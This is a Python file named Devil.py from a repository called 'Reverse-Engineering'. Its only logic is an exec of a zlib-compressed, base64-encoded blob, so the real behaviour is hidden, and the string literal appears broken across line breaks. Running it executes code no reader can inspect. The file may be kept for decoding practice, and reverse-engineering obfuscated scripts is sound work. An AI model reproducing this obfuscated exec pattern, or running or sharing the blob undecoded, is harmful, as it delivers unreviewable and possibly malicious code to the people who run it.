| max_stars_repo_head_hexsha | 469efabcd6057f7895d8d891f1fabdf2ffe730b0 |
| max_stars_repo_licenses | ["Apache-2.0"] |
| max_stars_count | 337 |
| max_stars_repo_stars_event_min_datetime | 2020-08-15T12:22:14.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-29T06:05:15.000Z |
| max_issues_repo_path | Devil/Devil.py |
| max_issues_repo_name | ajairakaam/Reverse-Engineering |
| max_issues_repo_head_hexsha | 49d00bafd0622ffb79e081946a19c5fd3a42628f |
| max_issues_repo_licenses | ["Apache-2.0"] |
| max_issues_count | 3 |
| max_issues_repo_issues_event_min_datetime | 2020-11-12T14:30:48.000Z |
| max_issues_repo_issues_event_max_datetime | 2021-05-18T16:56:22.000Z |
| max_forks_repo_path | Devil/Devil.py |
| max_forks_repo_name | ajairakaam/Reverse-Engineering |
| max_forks_repo_head_hexsha | 49d00bafd0622ffb79e081946a19c5fd3a42628f |
| max_forks_repo_licenses | ["Apache-2.0"] |
| max_forks_count | 83 |
| max_forks_repo_forks_event_min_datetime | 2020-08-15T00:22:58.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-03-31T08:40:23.000Z |

content:

```python
#Original Written By Qaiser
#Youtube : Tech Qaiser
#Github : https:github.com/TechQaiser
import zlib,base64
exec(zlib.decompress(base64.b64decode("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